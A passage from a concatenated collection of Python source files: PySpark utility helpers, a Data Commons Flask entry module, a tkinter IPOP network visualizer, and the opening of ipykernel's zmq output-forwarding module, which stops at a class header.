        except StopIteration as stop_iter:
            raise RuntimeError(
                "Caught StopIteration thrown from user's code; failing the task", stop_iter
            )

    return wrapper
def walk_tb(tb: Optional[TracebackType]) -> Iterator[TracebackType]:
    # Yield every frame of the traceback chain, outermost first.
    current = tb
    while current is not None:
        yield current
        current = current.tb_next
def try_simplify_traceback(tb: TracebackType) -> Optional[TracebackType]:
    """
    Simplify the traceback. It removes the tracebacks in the current package, and only
    shows the traceback that is related to the thirdparty and user-specified codes.

    Returns
    -------
    TracebackType or None
        Simplified traceback instance. It returns None if it fails to simplify.

    Notes
    -----
    This keeps the tracebacks once it sees they are from a different file even
    though the following tracebacks are from the current package.

    Examples
    --------
    >>> import importlib
    >>> import sys
    >>> import traceback
    >>> import tempfile
    >>> with tempfile.TemporaryDirectory() as tmp_dir:
    ...     with open("%s/dummy_module.py" % tmp_dir, "w") as f:
    ...         _ = f.write(
    ...             'def raise_stop_iteration():\\n'
    ...             '    raise StopIteration()\\n\\n'
    ...             'def simple_wrapper(f):\\n'
    ...             '    def wrapper(*a, **k):\\n'
    ...             '        return f(*a, **k)\\n'
    ...             '    return wrapper\\n')
    ...         f.flush()
    ...         spec = importlib.util.spec_from_file_location(
    ...             "dummy_module", "%s/dummy_module.py" % tmp_dir)
    ...         dummy_module = importlib.util.module_from_spec(spec)
    ...         spec.loader.exec_module(dummy_module)
    >>> def skip_doctest_traceback(tb):
    ...     import pyspark
    ...     root = os.path.dirname(pyspark.__file__)
    ...     pairs = zip(walk_tb(tb), traceback.extract_tb(tb))
    ...     for cur_tb, cur_frame in pairs:
    ...         if cur_frame.filename.startswith(root):
    ...             return cur_tb

    Regular exceptions should show the file name of the current package as below.

    >>> exc_info = None
    >>> try:
    ...     fail_on_stopiteration(dummy_module.raise_stop_iteration)()
    ... except Exception as e:
    ...     tb = sys.exc_info()[-1]
    ...     e.__cause__ = None
    ...     exc_info = "".join(
    ...         traceback.format_exception(type(e), e, tb))
    >>> print(exc_info)  # doctest: +NORMALIZE_WHITESPACE, +ELLIPSIS
    Traceback (most recent call last):
      File ...
        ...
      File "/.../pyspark/util.py", line ...
        ...
    RuntimeError: ...
    >>> "pyspark/util.py" in exc_info
    True

    If the traceback is simplified with this method, it hides the current package file name:

    >>> exc_info = None
    >>> try:
    ...     fail_on_stopiteration(dummy_module.raise_stop_iteration)()
    ... except Exception as e:
    ...     tb = try_simplify_traceback(sys.exc_info()[-1])
    ...     e.__cause__ = None
    ...     exc_info = "".join(
    ...         traceback.format_exception(
    ...             type(e), e, try_simplify_traceback(skip_doctest_traceback(tb))))
    >>> print(exc_info)  # doctest: +NORMALIZE_WHITESPACE, +ELLIPSIS
    RuntimeError: ...
    >>> "pyspark/util.py" in exc_info
    False

    In the case below, the traceback contains the current package in the middle.
    In this case, it just hides the top occurrence only.

    >>> exc_info = None
    >>> try:
    ...     fail_on_stopiteration(dummy_module.simple_wrapper(
    ...         fail_on_stopiteration(dummy_module.raise_stop_iteration)))()
    ... except Exception as e:
    ...     tb = sys.exc_info()[-1]
    ...     e.__cause__ = None
    ...     exc_info_a = "".join(
    ...         traceback.format_exception(type(e), e, tb))
    ...     exc_info_b = "".join(
    ...         traceback.format_exception(
    ...             type(e), e, try_simplify_traceback(skip_doctest_traceback(tb))))
    >>> exc_info_a.count("pyspark/util.py")
    2
    >>> exc_info_b.count("pyspark/util.py")
    1
    """
    if "pypy" in platform.python_implementation().lower():
        # Traceback modification is not supported with PyPy in PySpark.
        return None
    if sys.version_info[:2] < (3, 7):
        # Traceback creation is not supported Python < 3.7.
        # See https://bugs.python.org/issue30579.
        return None

    import pyspark

    # Frames whose filename lives under the pyspark install root are
    # considered "current package" frames to be hidden.
    root = os.path.dirname(pyspark.__file__)
    tb_next = None
    new_tb = None
    pairs = zip(walk_tb(tb), traceback.extract_tb(tb))
    last_seen = []

    # Skip the leading run of pyspark-internal frames; stop at the first
    # frame that belongs to user/third-party code and remember it.
    for cur_tb, cur_frame in pairs:
        if not cur_frame.filename.startswith(root):
            # Filter the stacktrace from the PySpark source itself.
            last_seen = [(cur_tb, cur_frame)]
            break

    # Rebuild the remaining chain back-to-front so tb_next links stay intact.
    for cur_tb, cur_frame in reversed(list(itertools.chain(last_seen, pairs))):
        # Once we have seen the file names outside, don't skip.
        new_tb = TracebackType(
            tb_next=tb_next,
            tb_frame=cur_tb.tb_frame,
            tb_lasti=cur_tb.tb_frame.f_lasti,
            tb_lineno=cur_tb.tb_frame.f_lineno if cur_tb.tb_frame.f_lineno is not None else -1,
        )
        tb_next = new_tb
    return new_tb
def _print_missing_jar(lib_name: str, pkg_name: str, jar_name: str, spark_version: str) -> None:
print(
"""
________________________________________________________________________________________________
Spark %(lib_name)s libraries not found in class path. Try one of the following.
1. Include the %(lib_name)s library and its dependencies with in the
spark-submit command as
$ bin/spark-submit --packages org.apache.spark:spark-%(pkg_name)s:%(spark_version)s ...
2. Download the JAR of the artifact from Maven Central http://search.maven.org/,
Group Id = org.apache.spark, Artifact Id = spark-%(jar_name)s, Version = %(spark_version)s.
Then, include the jar in the spark-submit command as
$ bin/spark-submit --jars <spark-%(jar_name)s.jar> ...
________________________________________________________________________________________________
"""
% {
"lib_name": lib_name,
"pkg_name": pkg_name,
"jar_name": jar_name,
"spark_version": spark_version,
}
)
def _parse_memory(s: str) -> int:
"""
Parse a memory string in the format supported by Java (e.g. 1g, 200m) and
return the value in MiB
Examples
--------
>>> _parse_memory("256m")
256
>>> _parse_memory("2g")
2048
"""
units = {"g": 1024, "m": 1, "t": 1 << 20, "k": 1.0 / 1024}
if s[-1].lower() not in units:
raise ValueError("invalid format: " + s)
return int(float(s[:-1]) * units[s[-1].lower()])
def inheritable_thread_target(f: Callable) -> Callable:
    """
    Return thread target wrapper which is recommended to be used in PySpark when the
    pinned thread mode is enabled. The wrapper function, before calling original
    thread target, it inherits the inheritable properties specific
    to JVM thread such as ``InheritableThreadLocal``.

    Also, note that pinned thread mode does not close the connection from Python
    to JVM when the thread is finished in the Python side. With this wrapper, Python
    garbage-collects the Python thread instance and also closes the connection
    which finishes JVM thread correctly.

    When the pinned thread mode is off, it return the original ``f``.

    .. versionadded:: 3.2.0

    Parameters
    ----------
    f : function
        the original thread target.

    Notes
    -----
    This API is experimental.

    It is important to know that it captures the local properties when you decorate it
    whereas :class:`InheritableThread` captures when the thread is started.
    Therefore, it is encouraged to decorate it when you want to capture the local
    properties.

    For example, the local properties from the current Spark context is captured
    when you define a function here instead of the invocation:

    >>> @inheritable_thread_target
    ... def target_func():
    ...     pass  # your codes.

    If you have any updates on local properties afterwards, it would not be reflected to
    the Spark context in ``target_func()``.

    The example below mimics the behavior of JVM threads as close as possible:

    >>> Thread(target=inheritable_thread_target(target_func)).start()  # doctest: +SKIP
    """
    from pyspark import SparkContext

    if isinstance(SparkContext._gateway, ClientServer):  # type: ignore[attr-defined]
        # Here's when the pinned-thread mode (PYSPARK_PIN_THREAD) is on.

        # NOTICE the internal difference vs `InheritableThread`. `InheritableThread`
        # copies local properties when the thread starts but `inheritable_thread_target`
        # copies when the function is wrapped.
        assert SparkContext._active_spark_context is not None
        # Snapshot of the JVM-side local properties, captured at decoration time.
        properties = SparkContext._active_spark_context._jsc.sc().getLocalProperties().clone()

        @functools.wraps(f)
        def wrapped(*args: Any, **kwargs: Any) -> Any:
            try:
                # Set local properties in child thread.
                assert SparkContext._active_spark_context is not None
                SparkContext._active_spark_context._jsc.sc().setLocalProperties(  # type: ignore[attr-defined]
                    properties
                )
                return f(*args, **kwargs)
            finally:
                # Close this thread's py4j connection so the matching JVM
                # thread can finish.
                InheritableThread._clean_py4j_conn_for_current_thread()

        return wrapped
    else:
        # Pinned thread mode off: no per-thread JVM state to propagate.
        return f
class InheritableThread(threading.Thread):
    """
    Thread that is recommended to be used in PySpark instead of :class:`threading.Thread`
    when the pinned thread mode is enabled. The usage of this class is exactly same as
    :class:`threading.Thread` but correctly inherits the inheritable properties specific
    to JVM thread such as ``InheritableThreadLocal``.
    Also, note that pinned thread mode does not close the connection from Python
    to JVM when the thread is finished in the Python side. With this class, Python
    garbage-collects the Python thread instance and also closes the connection
    which finishes JVM thread correctly.
    When the pinned thread mode is off, this works as :class:`threading.Thread`.
    .. versionadded:: 3.1.0
    Notes
    -----
    This API is experimental.
    """
    # JVM Properties object captured in start(); only set in pinned-thread mode.
    _props: JavaObject
    def __init__(self, target: Callable, *args: Any, **kwargs: Any):
        # Imported lazily to avoid a circular import at module load time.
        from pyspark import SparkContext
        if isinstance(SparkContext._gateway, ClientServer):  # type: ignore[attr-defined]
            # Here's when the pinned-thread mode (PYSPARK_PIN_THREAD) is on.
            def copy_local_properties(*a: Any, **k: Any) -> Any:
                # self._props is set before starting the thread to match the behavior with JVM.
                assert hasattr(self, "_props")
                assert SparkContext._active_spark_context is not None
                SparkContext._active_spark_context._jsc.sc().setLocalProperties(  # type: ignore[attr-defined]
                    self._props
                )
                try:
                    return target(*a, **k)
                finally:
                    # Release the per-thread Py4J connection even when the
                    # target raises, so the paired JVM thread can finish.
                    InheritableThread._clean_py4j_conn_for_current_thread()
            super(InheritableThread, self).__init__(
                target=copy_local_properties, *args, **kwargs  # type: ignore[misc]
            )
        else:
            # Pinned-thread mode off: behave exactly like threading.Thread.
            super(InheritableThread, self).__init__(
                target=target, *args, **kwargs  # type: ignore[misc]
            )
    def start(self) -> None:
        from pyspark import SparkContext
        if isinstance(SparkContext._gateway, ClientServer):  # type: ignore[attr-defined]
            # Here's when the pinned-thread mode (PYSPARK_PIN_THREAD) is on.
            # Local property copy should happen in Thread.start to mimic JVM's behavior.
            assert SparkContext._active_spark_context is not None
            self._props = SparkContext._active_spark_context._jsc.sc().getLocalProperties().clone()
        return super(InheritableThread, self).start()
    @staticmethod
    def _clean_py4j_conn_for_current_thread() -> None:
        """Drop the current thread's Py4J connection from the pool and close it."""
        from pyspark import SparkContext
        jvm = SparkContext._jvm
        assert jvm is not None
        thread_connection = jvm._gateway_client.get_thread_connection()
        if thread_connection is not None:
            try:
                # Dequeue is shared across other threads but it's thread-safe.
                # If this function has to be invoked one more time in the same thead
                # Py4J will create a new connection automatically.
                jvm._gateway_client.deque.remove(thread_connection)
            except ValueError:
                # Should never reach this point
                return
            finally:
                thread_connection.close()
if __name__ == "__main__":
    # Run this module's doctests against a local SparkContext. PyPy is skipped
    # and so is Python < 3.7 (doctest output assumptions hold from 3.7 on).
    if "pypy" not in platform.python_implementation().lower() and sys.version_info[:2] >= (3, 7):
        import doctest
        import pyspark.util
        from pyspark.context import SparkContext
        globs = pyspark.util.__dict__.copy()
        # Doctests may reference `sc`; give them a small local cluster.
        globs["sc"] = SparkContext("local[4]", "PythonTest")
        (failure_count, test_count) = doctest.testmod(pyspark.util, globs=globs)
        globs["sc"].stop()
        if failure_count:
            # Non-zero exit so CI treats doctest failures as a build failure.
            sys.exit(-1)
|
main.py
|
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Main entry module specified in app.yaml.
This module contains the request handler codes and the main app.
"""
import logging
import os
import requests
import sys
import threading
import time
import flask
from flask import request
import services.datacommons as dc
from __init__ import create_app
logging.basicConfig(level=logging.INFO,
                    format='%(asctime)s %(levelname)s %(lineno)d : %(message)s')
# Flask application built by the factory in __init__.py.
app = create_app()
# Expose selected configuration values to every Jinja template.
app.jinja_env.globals['GA_ACCOUNT'] = app.config['GA_ACCOUNT']
app.jinja_env.globals['NAME'] = app.config['NAME']
app.jinja_env.globals['BASE_HTML'] = app.config['BASE_HTML_PATH']
# Endpoints requested once at startup (see send_warmup_requests) to
# pre-populate backend caches before live traffic arrives.
WARM_UP_ENDPOINTS = [
    "/api/choropleth/geojson?placeDcid=country/USA&placeType=County",
    "/api/place/parent/country/USA",
    "/api/place/places-in-names?dcid=country/USA&placeType=County",
    "/api/stats/set/series/within-place?parent_place=country/USA&child_type=County&stat_vars=Count_Person",
]
def send_warmup_requests():
    """Hit each warm-up endpoint until it answers with HTTP 200.

    Runs in a background thread at startup (see the module bottom) so backend
    caches are populated before real traffic arrives. Each endpoint is retried
    once per second until it succeeds; the function returns when every
    endpoint has been warmed.
    """
    logging.info("Sending warm up requests:")
    for endpoint in WARM_UP_ENDPOINTS:
        while True:
            try:
                resp = requests.get("http://127.0.0.1:8080" + endpoint)
                if resp.status_code == 200:
                    break
            except requests.exceptions.RequestException:
                # The local server may not be accepting connections yet.
                # Narrowed from a bare `except:` which also swallowed
                # SystemExit/KeyboardInterrupt and hid real bugs.
                logging.info("Warm up request to %s failed; retrying", endpoint)
            time.sleep(1)
@app.before_request
def before_request():
    """Permanently redirect plain-HTTP requests to HTTPS.

    The scheme the client used is read from the ``X-Forwarded-Proto`` header
    set by the load balancer; returning ``None`` lets Flask continue with
    normal request handling.
    """
    forwarded_proto = request.headers.get('X-Forwarded-Proto')
    if forwarded_proto != 'http':
        return None
    if not request.url.startswith('http://'):
        return None
    secure_url = request.url.replace('http://', 'https://', 1)
    return flask.redirect(secure_url, code=301)
# TODO(beets): Move this to a separate handler so it won't be installed on all apps.
@app.route('/translator')
def translator_handler():
    """Serve the schema translator page."""
    template_name = 'translator.html'
    return flask.render_template(template_name)
@app.route('/healthz')
def healthz():
    """Health-check endpoint for load balancers / readiness probes."""
    response_body = "very healthy"
    return response_body
# TODO(beets): Move this to a separate handler so it won't be installed on all apps.
@app.route('/mcf_playground')
def mcf_playground():
    """Serve the MCF playground page."""
    template_name = 'mcf_playground.html'
    return flask.render_template(template_name)
# TODO(shifucun): get branch cache version from mixer
@app.route('/version')
def version():
    # Fetch the mixer backend's version metadata and render it alongside this
    # website's own build hash (injected via the WEBSITE_HASH env var).
    mixer_version = dc.version()
    return flask.render_template('version.html',
                                 website_hash=os.environ.get("WEBSITE_HASH"),
                                 mixer_hash=mixer_version['gitHash'],
                                 tables=mixer_version['tables'],
                                 bigquery=mixer_version['bigQuery'])
# Kick off cache warm-up in the background for real deployments only;
# test, webdriver and local-development configurations skip it.
if not (app.config["TEST"] or app.config["WEBDRIVER"] or app.config["LOCAL"]):
    thread = threading.Thread(target=send_warmup_requests)
    thread.start()
if __name__ == '__main__':
    # This is used when running locally only. When deploying to GKE,
    # a webserver process such as Gunicorn will serve the app.
    logging.info("Run web server in local mode")
    # sys.argv values are strings; the WSGI server needs a numeric port,
    # so cast explicitly (previously the raw string was passed through).
    port = int(sys.argv[1]) if len(sys.argv) >= 2 else 8080
    app.run(host='127.0.0.1', port=port, debug=True)
|
visualizer.py
|
#!/usr/bin/env python
# pacman -S tk
from threading import Thread # listener thread
from math import sin,cos,pi # gui positioning
import hashlib # calculating uid
import time # ttl and refresh
import tkinter # gui library
import sys # arguments and exit
import socket # listener
import json # decoding packets
# canvas object - graphical user interface tool
class Canvas(object):
    """Thin wrapper over a tkinter window with simple draw primitives."""
    # initialize canvas
    def __init__(self, width, height, margin, title):
        # canvas constants
        self.WIDTH = width
        self.HEIGHT = height
        self.MARGIN = margin
        # Center of the window; node ring is laid out around this point.
        self.MID_X = self.WIDTH / 2
        self.MID_Y = self.HEIGHT / 2
        # Ring radius: largest circle that fits with the requested margin.
        self.RADIUS = min(self.MID_X, self.MID_Y) - self.MARGIN
        # create canvas
        self.tk = tkinter.Tk()
        self.tk.title(title)
        self.tk.configure(background='black')
        self.tk.resizable(0,0)
        self.canvas = tkinter.Canvas(self.tk, width=self.WIDTH, height=self.HEIGHT, bg='black')
        self.canvas.pack()
    # canvas operators
    def draw_circle(self, x, y, r, f=None):
        # f is the fill color (tkinter color name or None for unfilled).
        self.canvas.create_oval(x-r,y-r,x+r,y+r, outline='black', width=1, fill=f)
    def draw_line(self, x_i, y_i, x_j, y_j, f=None):
        self.canvas.create_line(x_i, y_i, x_j, y_j, fill=f, width=1)
    def draw_text(self, x, y, t):
        self.canvas.create_text(x, y, text=t, fill='white', justify=tkinter.CENTER)
    def update(self):
        # Process pending tkinter events and repaint the window.
        self.tk.update()
    def clear(self):
        # Remove every drawn item; the caller redraws the full frame each tick.
        self.canvas.delete('all')
# network object - state of the network
class Network(object):
    """Holds the visualized overlay state: one Node per peer, sorted by UID."""
    class Node(object):
        def __init__(self, x, y, n_x, n_y, ip4):
            # Short label: last octet of the IPv4 address.
            self.name = ip4.split('.')[3]
            self.ip4 = ip4
            # (x, y): node position on the ring; (n_x, n_y): label position.
            self.x = x
            self.y = y
            self.n_x = n_x
            self.n_y = n_y
            # Unix timestamp of the last status report (0 = never seen).
            self.state = 0
            # Peer node indices keyed by link type.
            self.links = {
                "successor": [],
                "chord": [],
                "on_demand": [],
                "inbound": []
            }
    def __init__(self, nr_nodes, ip4_mask_addr):
        # NOTE(review): relies on the module-global `canvas` being created
        # before this constructor runs (main() guarantees that order).
        self.uid_nid_table = {} # uid to node index mapping
        self.uid_ip4_table = {} # uid to ipv4 mapping
        self.nodes = [] # list of nodes indexed by node index
        # create nodes (sorted by uid)
        for i in range(nr_nodes):
            # Addresses are assigned sequentially under the /16 prefix.
            ip4 = ip4_mask_addr + str(i // 256) + "." + str(i % 256)
            # UID is the hex SHA-1 of the address (40 hex chars).
            uid = hashlib.sha1(bytes(ip4,'utf-8')).hexdigest()[:40]
            self.uid_ip4_table[uid] = ip4
        sorted_uid = sorted(self.uid_ip4_table.keys())
        for i in range(nr_nodes):
            uid = sorted_uid[i]
            ip4 = self.uid_ip4_table[uid]
            self.uid_nid_table[uid] = i
            # Evenly space nodes on a circle; labels sit 20px outside the ring.
            x = canvas.RADIUS * cos(i*2*pi/nr_nodes) + canvas.MID_X
            y = canvas.RADIUS * sin(i*2*pi/nr_nodes) + canvas.MID_Y
            n_x = (20 + canvas.RADIUS) * cos(i*2*pi/nr_nodes) + canvas.MID_X
            n_y = (20 + canvas.RADIUS) * sin(i*2*pi/nr_nodes) + canvas.MID_Y
            self.nodes.append(Network.Node(x, y, n_x, n_y, ip4))
# listener thread - listens for network state and updates the data accordingly
def listener(protocol, recv_ipv4, recv_port):
    """Receive JSON status reports (TCP stream or UDP datagrams) and update
    the global `network` object. Runs until the global `runnable` goes False.
    """
    # initialize listener socket
    if protocol == "tcp":
        # TCP mode connects out to a reporting endpoint...
        recv_sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        recv_sock.connect((recv_ipv4, recv_port))
    else:
        # ...while UDP mode binds locally and waits for datagrams.
        recv_sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
        recv_sock.bind((recv_ipv4, recv_port))
    while runnable:
        msg = {}
        if protocol == "tcp":
            # stream head
            # Framing appears to be a 6-byte header whose chars [1:5] are the
            # ASCII payload length — TODO confirm against the sender side.
            stream = recv_sock.recv(6)
            while len(stream) < 6:
                stream += recv_sock.recv(6 - len(stream))
            head = int(stream.decode("utf8")[1:5])
            # stream data
            data = ""
            while head != 0:
                # Keep reading until the announced payload length is consumed.
                stream = recv_sock.recv(head)
                data += stream.decode("utf8")
                head -= len(stream)
        else:
            gram = recv_sock.recv(8192)
            data = gram.decode("utf8")
        msg = json.loads(data)
        print(network.uid_ip4_table[msg["uid"]])
        node_index = network.uid_nid_table[msg["uid"]]
        # Record the report time; nodes are drawn "online" for 10 seconds.
        network.nodes[node_index].state = int(time.time())
        for con_type in ["successor", "chord", "on_demand", "inbound"]:
            # Translate the reported peer UIDs into node indices.
            network.nodes[node_index].links[con_type] = [network.uid_nid_table[x] for x in msg[con_type]]
def main():
    """Parse CLI arguments, start the listener thread and run the redraw loop."""
    global runnable
    global canvas
    global network
    # parse arguments
    try:
        protocol = str(sys.argv[1])
        recv_ipv4 = str(sys.argv[2])
        recv_port = int(sys.argv[3])
        nr_nodes = int(sys.argv[4])
        canvas_sz = int(sys.argv[5])
    # NOTE(review): bare except also swallows SystemExit/KeyboardInterrupt;
    # consider narrowing to (IndexError, ValueError).
    except:
        print('usage: ' + sys.argv[0] + ' <protocol> <recv_ipv4> <recv_port> <nr_nodes> <canvas_sz>')
        sys.exit()
    # hard-coded arguments
    ip4_addr = "172.31.0.0"
    ip4_mask = 16
    ip4_mask_addr = "172.31."
    # set runnable state; create canvas and graph objects
    # (canvas must exist before Network, whose constructor reads its geometry)
    runnable = True
    canvas = Canvas(canvas_sz, canvas_sz, 50, 'IPOP Network Visualizer')
    network = Network(nr_nodes, ip4_mask_addr)
    # launch listener
    thread_listener = Thread(target=listener, args=(protocol, recv_ipv4, recv_port,))
    thread_listener.start()
    # main loop
    # Redraws the whole frame ~10x per second: links first so node circles
    # are painted on top of them.
    while True:
        nr_online_nodes = 0
        nr_successor_links = 0
        nr_chord_links = 0
        nr_on_demand_links = 0
        # draw links
        for node in network.nodes:
            if int(time.time()) < node.state + 10: # assumed online
                for peer in node.links["on_demand"]:
                    canvas.draw_line(node.x, node.y, network.nodes[peer].x, network.nodes[peer].y, 'orange')
                    nr_on_demand_links += 1
                for peer in node.links["chord"]:
                    canvas.draw_line(node.x, node.y, network.nodes[peer].x, network.nodes[peer].y, 'white')
                    nr_chord_links += 1
                for peer in node.links["successor"]:
                    canvas.draw_line(node.x, node.y, network.nodes[peer].x, network.nodes[peer].y, 'yellow')
                    nr_successor_links += 1
        # draw nodes
        for node in network.nodes:
            if int(time.time()) < node.state + 10: # assumed online
                canvas.draw_circle(node.x, node.y, 5, 'green')
                nr_online_nodes += 1
            else:
                canvas.draw_circle(node.x, node.y, 5, 'red')
            canvas.draw_text(node.n_x, node.n_y, node.name)
        # Stats legend in the top-left corner.
        canvas.draw_text(16, 10, "ipv4")
        canvas.draw_text(20, 25, "nodes")
        canvas.draw_text(34, 40, "successors")
        canvas.draw_text(22, 55, "chords")
        canvas.draw_text(34, 70, "on-demand")
        canvas.draw_text(120, 10, ip4_addr + "/" + str(ip4_mask))
        canvas.draw_text(120, 25, nr_online_nodes)
        canvas.draw_text(120, 40, nr_successor_links)
        canvas.draw_text(120, 55, nr_chord_links)
        # On-demand links are counted from both endpoints, hence the halving.
        canvas.draw_text(120, 70, nr_on_demand_links // 2)
        canvas.update()
        canvas.clear()
        time.sleep(0.1)
if __name__ == "__main__":
    main()
|
iostream.py
|
# coding: utf-8
"""Wrappers for forwarding stdout/stderr over zmq"""
# Copyright (c) IPython Development Team.
# Distributed under the terms of the Modified BSD License.
from __future__ import print_function
import atexit
from binascii import b2a_hex
import os
import sys
import threading
import warnings
from io import StringIO, UnsupportedOperation, TextIOBase
import zmq
from zmq.eventloop.ioloop import IOLoop
from zmq.eventloop.zmqstream import ZMQStream
from jupyter_client.session import extract_header
from ipython_genutils import py3compat
from ipython_genutils.py3compat import unicode_type
#-----------------------------------------------------------------------------
# Globals
#-----------------------------------------------------------------------------
MASTER = 0
CHILD = 1
#-----------------------------------------------------------------------------
# IO classes
#-----------------------------------------------------------------------------
class IOPubThread(object):
    """An object for sending IOPub messages in a background thread
    Prevents a blocking main thread from delaying output from threads.
    IOPubThread(pub_socket).background_socket is a Socket-API-providing object
    whose IO is always run in a thread.
    """
    def __init__(self, socket, pipe=False):
        """Create IOPub thread
        Parameters
        ----------
        socket: zmq.PUB Socket
            the socket on which messages will be sent.
        pipe: bool
            Whether this process should listen for IOPub messages
            piped from subprocesses.
        """
        self.socket = socket
        self.background_socket = BackgroundSocket(self)
        # Remember the creating pid so forked children can be detected later.
        self._master_pid = os.getpid()
        self._pipe_flag = pipe
        self.io_loop = IOLoop()
        if pipe:
            self._setup_pipe_in()
        # Thread-local storage for the per-thread PUSH end of the event pipe.
        self._local = threading.local()
        # Pending callbacks keyed by random event id (see schedule()).
        self._events = {}
        self._setup_event_pipe()
        self.thread = threading.Thread(target=self._thread_main)
        self.thread.daemon = True
    def _thread_main(self):
        """The inner loop that's actually run in a thread"""
        self.io_loop.start()
        # Runs after io_loop.stop() is called (see stop()).
        self.io_loop.close(all_fds=True)
    def _setup_event_pipe(self):
        """Create the PULL socket listening for events that should fire in this thread."""
        ctx = self.socket.context
        pipe_in = ctx.socket(zmq.PULL)
        pipe_in.linger = 0
        # Random inproc endpoint name so multiple instances don't collide.
        _uuid = b2a_hex(os.urandom(16)).decode('ascii')
        iface = self._event_interface = 'inproc://%s' % _uuid
        pipe_in.bind(iface)
        self._event_puller = ZMQStream(pipe_in, self.io_loop)
        self._event_puller.on_recv(self._handle_event)
    @property
    def _event_pipe(self):
        """thread-local event pipe for signaling events that should be processed in the thread"""
        try:
            event_pipe = self._local.event_pipe
        except AttributeError:
            # new thread, new event pipe
            ctx = self.socket.context
            event_pipe = ctx.socket(zmq.PUSH)
            event_pipe.linger = 0
            event_pipe.connect(self._event_interface)
            self._local.event_pipe = event_pipe
        return event_pipe
    def _handle_event(self, msg):
        """Handle an event on the event pipe"""
        # msg[0] is the event id sent by schedule(); pop so each callback
        # fires exactly once.
        event_id = msg[0]
        event_f = self._events.pop(event_id)
        event_f()
    def _setup_pipe_in(self):
        """setup listening pipe for IOPub from forked subprocesses"""
        ctx = self.socket.context
        # use UUID to authenticate pipe messages
        self._pipe_uuid = os.urandom(16)
        pipe_in = ctx.socket(zmq.PULL)
        pipe_in.linger = 0
        try:
            self._pipe_port = pipe_in.bind_to_random_port("tcp://127.0.0.1")
        except zmq.ZMQError as e:
            # Degrade gracefully: subprocess output is lost but the kernel
            # keeps working.
            warnings.warn("Couldn't bind IOPub Pipe to 127.0.0.1: %s" % e +
                "\nsubprocess output will be unavailable."
            )
            self._pipe_flag = False
            pipe_in.close()
            return
        self._pipe_in = ZMQStream(pipe_in, self.io_loop)
        self._pipe_in.on_recv(self._handle_pipe_msg)
    def _handle_pipe_msg(self, msg):
        """handle a pipe message from a subprocess"""
        if not self._pipe_flag or not self._is_master_process():
            return
        # First frame must carry the shared secret set in _setup_pipe_in.
        if msg[0] != self._pipe_uuid:
            print("Bad pipe message: %s", msg, file=sys.__stderr__)
            return
        self.send_multipart(msg[1:])
    def _setup_pipe_out(self):
        # must be new context after fork
        ctx = zmq.Context()
        pipe_out = ctx.socket(zmq.PUSH)
        pipe_out.linger = 3000 # 3s timeout for pipe_out sends before discarding the message
        pipe_out.connect("tcp://127.0.0.1:%i" % self._pipe_port)
        return ctx, pipe_out
    def _is_master_process(self):
        # True when running in the process that created this thread.
        return os.getpid() == self._master_pid
    def _check_mp_mode(self):
        """check for forks, and switch to zmq pipeline if necessary"""
        if not self._pipe_flag or self._is_master_process():
            return MASTER
        else:
            return CHILD
    def start(self):
        """Start the IOPub thread"""
        self.thread.start()
        # make sure we don't prevent process exit
        # I'm not sure why setting daemon=True above isn't enough, but it doesn't appear to be.
        atexit.register(self.stop)
    def stop(self):
        """Stop the IOPub thread"""
        if not self.thread.is_alive():
            return
        self.io_loop.add_callback(self.io_loop.stop)
        self.thread.join()
        # Close the thread-local event pipe of the calling thread, if any.
        if hasattr(self._local, 'event_pipe'):
            self._local.event_pipe.close()
    def close(self):
        self.socket.close()
        self.socket = None
    @property
    def closed(self):
        return self.socket is None
    def schedule(self, f):
        """Schedule a function to be called in our IO thread.
        If the thread is not running, call immediately.
        """
        if self.thread.is_alive():
            # Random id pairs the callback stored here with the frame sent
            # over the event pipe (consumed by _handle_event in the IO thread).
            event_id = os.urandom(16)
            while event_id in self._events:
                event_id = os.urandom(16)
            self._events[event_id] = f
            self._event_pipe.send(event_id)
        else:
            f()
    def send_multipart(self, *args, **kwargs):
        """send_multipart schedules actual zmq send in my thread.
        If my thread isn't running (e.g. forked process), send immediately.
        """
        self.schedule(lambda : self._really_send(*args, **kwargs))
    def _really_send(self, msg, *args, **kwargs):
        """The callback that actually sends messages"""
        mp_mode = self._check_mp_mode()
        if mp_mode != CHILD:
            # we are master, do a regular send
            self.socket.send_multipart(msg, *args, **kwargs)
        else:
            # we are a child, pipe to master
            # new context/socket for every pipe-out
            # since forks don't teardown politely, use ctx.term to ensure send has completed
            ctx, pipe_out = self._setup_pipe_out()
            pipe_out.send_multipart([self._pipe_uuid] + msg, *args, **kwargs)
            pipe_out.close()
            ctx.term()
class BackgroundSocket(object):
    """Wrapper around IOPub thread that provides zmq send[_multipart].

    Unknown attribute reads and writes are forwarded to the wrapped
    ``io_thread.socket`` (with a DeprecationWarning) for backward
    compatibility with code that expects a raw zmq socket.
    """
    io_thread = None
    def __init__(self, io_thread):
        self.io_thread = io_thread
    def __getattr__(self, attr):
        """Wrap socket attr access for backward-compatibility"""
        if attr.startswith('__') and attr.endswith('__'):
            # don't wrap magic methods; object has no __getattr__, so raise
            # a plain AttributeError instead of the confusing
            # "'super' object has no attribute '__getattr__'" the original
            # super() call produced.
            raise AttributeError(attr)
        if hasattr(self.io_thread.socket, attr):
            warnings.warn("Accessing zmq Socket attribute %s on BackgroundSocket" % attr,
                DeprecationWarning, stacklevel=2)
            return getattr(self.io_thread.socket, attr)
        raise AttributeError(attr)
    def __setattr__(self, attr, value):
        # Fixed parenthesization: the original read
        #   attr.startswith('__' and attr.endswith('__'))
        # which passed a bool to str.startswith and raised TypeError for every
        # non-dunder attribute other than 'io_thread'.
        if attr == 'io_thread' or (attr.startswith('__') and attr.endswith('__')):
            super(BackgroundSocket, self).__setattr__(attr, value)
        else:
            warnings.warn("Setting zmq Socket attribute %s on BackgroundSocket" % attr,
                DeprecationWarning, stacklevel=2)
            setattr(self.io_thread.socket, attr, value)
    def send(self, msg, *args, **kwargs):
        return self.send_multipart([msg], *args, **kwargs)
    def send_multipart(self, *args, **kwargs):
        """Schedule send in IO thread"""
        return self.io_thread.send_multipart(*args, **kwargs)
class OutStream(TextIOBase):
